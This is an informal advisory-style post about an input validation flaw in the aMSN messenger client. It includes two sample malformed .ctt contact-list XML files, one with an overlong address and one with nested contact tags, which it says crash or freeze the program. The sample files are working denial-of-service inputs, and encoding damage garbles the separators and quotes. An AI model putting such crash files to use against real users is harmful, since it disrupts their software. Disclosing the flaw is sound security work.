Risk: Low
Tipology: Input Validation Error

All aMSN versions, both on Windows and Linux platorms.

As Microsoft MSN, aMSN have a nice feature for Exporting and Importing the list of
contacts you have.

This list is dumped into an XML file (file extension .ctt), with this structure

覧覧覧覧覧覧覧覧覧覧覧-
<?xml version=1.0″?>
<messenger>
<service name=.NET Messenger Service>
<contactlist>
<contact> your_contact@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
覧覧覧覧覧覧覧覧覧覧覧


aMSN does not Validate correctly the Contacts you insert, precisely does not parse
the format of this file, and suddenly when you import a malformed Contact List it
shutdown

here an example of malformed input list

覧覧覧覧覧覧覧覧覧覧覧-
<?xml version=1.0″?>
<messenger>
<service name=.NET Messenger Service>
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
覧覧覧覧覧覧覧覧覧覧覧-


Or another possibility

覧覧覧覧覧覧覧覧覧覧覧-
<?xml version=1.0″?>
<messenger>
<service name=.NET Messenger Service>
<contactlist>
<contact><contact><contact><contact>
<contact></contact></contact><contact>
</contact></contact></contact></contact>
</contact>
</contactlist>
</service>
</messenger>
覧覧覧覧覧覧覧覧覧覧覧-


This will cause a freeze of aMSN..

If you use the same 鍍rick with Ms Messenger, a MessageBox will advice you of the malformed
file

See you to the next post